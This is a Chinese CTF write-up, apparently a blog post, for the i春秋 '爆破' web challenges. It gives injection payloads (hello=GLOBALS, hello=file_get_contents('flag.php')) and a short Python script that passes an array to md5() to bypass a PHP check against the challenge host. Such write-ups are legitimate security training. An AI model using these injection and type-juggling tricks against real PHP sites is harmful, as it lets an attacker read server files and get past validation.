i春秋CTF WEB-爆破

本文介绍了一种利用文件包含漏洞的方法,通过精心构造请求来绕过限制并获取隐藏的flag信息。文中详细解释了如何利用PHP全局变量GLOBALS以及md5函数的一个特性,通过Python脚本实现了自动化获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

爆破1,2,3

看似是爆破,其实可以直接GLOBALS查看所有的全局变量,其实考的是文件包含,六位字符的爆破实在是耗费时间==、

  1. hello=GLOBALS

  2. hello=file_get_contents('flag.php')

  3. 只要第一次传进去的value与session中的相等,则网页会输出下一个value值,通过使用md5函数不能对数组进行处理的漏洞来绕过substr(md5($value),5,4)==0的判断,使nums得值大于10即可得到flag

    python脚本

    # coding:utf-8
    import requests
    
    url = "http://344cb89508694654883e6e22c6fca5d6bbacd6e5f0b44746.game.ichunqiu.com/?value[]=ea"
    
    al = ['abcdefghijklmnopqrstuvwxyz']
    
    s = requests.session()
    
    r = s.get(url)
    
    for i in range(20):
        url = "http://344cb89508694654883e6e22c6fca5d6bbacd6e5f0b44746.game.ichunqiu.com/?value[]=" + r.content[0:2]
        r = s.get(url)
        if 'flag{' in r.content:
         print r.content[0:50]
         break
        else:
         print r.content[0:2]
    
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值